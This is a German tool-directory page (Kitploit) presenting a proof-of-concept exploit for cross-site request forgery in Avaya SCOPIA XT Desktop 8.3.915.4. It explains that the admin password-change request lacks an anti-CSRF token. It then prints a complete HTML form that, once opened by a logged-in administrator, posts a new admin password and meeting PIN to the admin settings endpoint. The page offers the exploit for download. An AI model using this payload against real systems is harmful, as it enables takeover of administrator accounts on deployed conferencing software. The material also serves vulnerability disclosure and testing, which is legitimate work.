Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 — Proof-of-Concept zur Demonstration von Cross-Site Request Forgery (CSRF) auf Avaya SCOPIA XT Desktop, das eine Änderung des Admin-Passworts ohne Anti-CSRF-Token ermöglicht. | Kitploit
Tools/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

Proof-of-Concept zur Demonstration von Cross-Site Request Forgery (CSRF) auf Avaya SCOPIA XT Desktop, das eine Änderung des Admin-Passworts ohne Anti-CSRF-Token ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 5 JahrenNoch nicht geprüft

CSRF-Exploit bei SCOPIA XT Desktop Version 8.3.915.4

Dieser PoC beschreibt, wie man Cross-Site Request Forgery (CSRF) bei SCOPIA XT Desktop Version 8.3.915.4 ausnutzt.


Über SCOPIA

Webseite: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


Über Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery, auch bekannt als One-Click-Angriff oder Session Riding und als CSRF oder XSRF abgekürzt, ist eine Art von bösartiger Ausnutzung einer Website, bei der nicht autorisierte Befehle von einem Benutzer übertragen werden, dem die Webanwendung vertraut.


Proof of Concept – Administrator-Passwort ändern

1

Auf der Seite „Directory and Authentication“ kann der Administrator sein Passwort ändern.

2

Beim Aufzeichnen der Anfrage mit Burp Suite konnte ich feststellen, dass kein Anti-CSRF-Token implementiert war und der einzige Sicherheitsmechanismus das Session-Cookie ist.

6

Ich habe diese HTML-Datei erstellt, die als PoC zur Ausnutzung der dargestellten Schwachstelle diente.

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

Wenn man sie im Browser ausführt, der ein gültiges Cookie für die SCOPIA-XT-Desktop-Verwaltungsumgebung besitzt, konnte das Passwort des Benutzers admin in „attacker“ geändert werden:

4

5

Tool herunterladen